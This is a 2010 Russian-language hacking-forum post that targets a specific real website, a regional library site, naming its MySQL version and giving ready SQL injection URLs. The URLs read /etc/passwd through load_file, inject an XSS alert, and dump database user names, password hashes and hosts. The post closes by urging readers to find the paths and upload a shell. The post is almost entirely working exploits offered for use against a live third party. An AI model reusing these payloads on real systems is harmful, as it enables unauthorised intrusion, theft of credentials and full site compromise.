21.06.2010, 03:26
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
pechory.library.ru
PR - 8
ТиЦ - 5400
MySQL 4.1.20
LOAD FILE:
Код:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10+from+mysql.user+--
с ковычками проблем нет)
---------------------------------------------------------
Sql Inj XSS:
Код:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,2,3,4,5,'alert();',7,8,9,10+from+mysql.user+--
---------------------------------------------------------
all:
Код:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,2,3,4,5,6,group_concat(0x0b,user,0x3a,password,0x3a,host,0x3a,file_priv),8,9,concat_ws(0x3a,@@version_compile_os,0x3a,user(),0x3a,version(),0x3a,database())+from+mysql.user+--
Вам осталось только раскрыть пути и залить шелл =)
|
|
|